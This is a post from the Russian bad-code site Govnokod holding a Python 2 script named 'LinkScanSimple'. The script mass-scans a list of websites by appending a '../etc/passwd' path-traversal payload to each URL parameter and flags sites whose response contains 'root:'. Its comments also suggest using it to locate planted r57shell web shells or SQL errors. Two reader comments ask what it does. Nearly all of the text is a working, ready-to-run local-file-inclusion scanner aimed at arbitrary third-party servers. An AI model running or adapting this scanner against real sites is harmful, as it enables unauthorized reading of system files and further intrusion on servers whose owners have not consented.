1. Python / Говнокод #449

    −227

    1. 01
    2. 02
    3. 03
    4. 04
    5. 05
    6. 06
    7. 07
    8. 08
    9. 09
    10. 10
    11. 11
    12. 12
    13. 13
    14. 14
    15. 15
    16. 16
    17. 17
    18. 18
    19. 19
    20. 20
    21. 21
    22. 22
    23. 23
    24. 24
    25. 25
    26. 26
    27. 27
    28. 28
    29. 29
    30. 30
    31. 31
    32. 32
    33. 33
    34. 34
    35. 35
    36. 36
    37. 37
    38. 38
    39. 39
    40. 40
    41. 41
    42. 42
    43. 43
    44. 44
    45. 45
    46. 46
    47. 47
    48. 48
    49. 49
    50. 50
    51. 51
    52. 52
    53. 53
    54. 54
    55. 55
    56. 56
    57. 57
    58. 58
    59. 59
    60. 60
    61. 61
    62. 62
    63. 63
    64. 64
    65. 65
    66. 66
    #!/usr/bin/python
    #LinkScanSimple will take a list of sites and
    #add an extension after the = then search the 
    #source for a match you choose. 
    
    #For an LFI scan I use "root:" but for a shell location
    #I would choose the shell title (r57shell). For SQL
    #you can choose a common sql error.
    
    import sys, re, urllib2, sets, socket
    socket.setdefaulttimeout(5)
    
    #---------------------------------------------------------
    #Edit what you want added to the address.
    EXT = "../../../../../../../../../../../../etc/passwd" 
    
    #Edit what you want to search for.
    MATCH = "root:"
    #---------------------------------------------------------
    
    def parse_urls(links):
    	urls = []
    	for link in links: 
    		num = link.count("=")
    		if num > 0:
    			for x in xrange(num):
    				link = link.rsplit("=",x+1)[0]+"="
    				urls.append(link+EXT)
    	urls = list(sets.Set(urls))
    	return urls
     
    def test(host): 
     	print "[+] Testing:",host.replace(EXT,"")
    	try: 
    		source = urllib2.urlopen(host).read() 
    		if re.search(MATCH, source): 
    			print "[+] Found:",host
    		else: 
    			print "[-] Not Vuln." 
    	except:
    		pass 
     
    
    print "\n\t   d3hydr8[at]gmail[dot]com LinkScanSimple v1.0"
    print "\t-------------------------------------------------\n"
    			
    if len(sys.argv) != 2:
    	print "Usage : ./linkscan.py <site_list>"
    	print "Ex: ./linkscan.py sites.txt\n"
    	sys.exit(1)
    	
    try:
    	sites = open(sys.argv[1], "r").readlines()
    except(IOError): 
      	print "Error: Check your site list path\n"
      	sys.exit(1)
    
    print "[+] Loaded:",len(sites),"sites"
    urls = parse_urls(sites)
    print "[+] Links Found:",len(urls)
    for url in urls: 
    	try:
    		test(url.replace("\n",""))
    	except(KeyboardInterrupt):
    		pass
    print "\n[-] Scan Complete\n"

    Запостил: guest, 23 Января 2009

    Комментарии (2) RSS

    • Hovnyuk:
      О ужас! Что сие делает? Может кто объяснит?
      Ответить
    • Мимо проходил:
      Ну насколько я понял тестирует сайты из списка на возможность уязвимость
      Ответить

    Добавить комментарий